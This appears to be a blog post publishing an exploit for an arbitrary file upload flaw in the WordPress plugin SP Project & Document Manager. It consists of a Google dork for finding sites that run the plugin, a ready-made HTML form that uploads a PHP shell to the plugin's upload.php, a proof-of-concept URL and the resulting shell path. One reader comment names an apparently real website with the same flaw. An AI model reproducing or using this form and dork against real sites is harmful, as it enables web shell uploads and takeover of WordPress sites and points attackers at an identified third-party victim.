Unknown On 03/09/16



# Exploit Title: Wordpress Plugins SP Project & Document Manager Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/sp-client-document-manager-premium/
# Date: 03/09/2016
# Software Link: https://wordpress.org/plugins/sp-client-document-manager/
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

Exploit CSRF :

<form method="post" action="http://site.com/path/wp-content/plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="nameshell in here.php" />
<input type="submit"></input></input></form>


Poc :
http://site.com/path/wp-content/plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php


Shell Path :
http://site.com/path/wp-content/uploads/sp-client-document-manager/nameshell in here.php

2 Responses so far.

  1. nemu yg bugnya sama bang, http://www.beraldoodontologia.com.br/wp-content/plugins/wp-landing-page/lib/plupload/examples/upload.php

Leave a Reply

Subscribe to Posts | Subscribe to Comments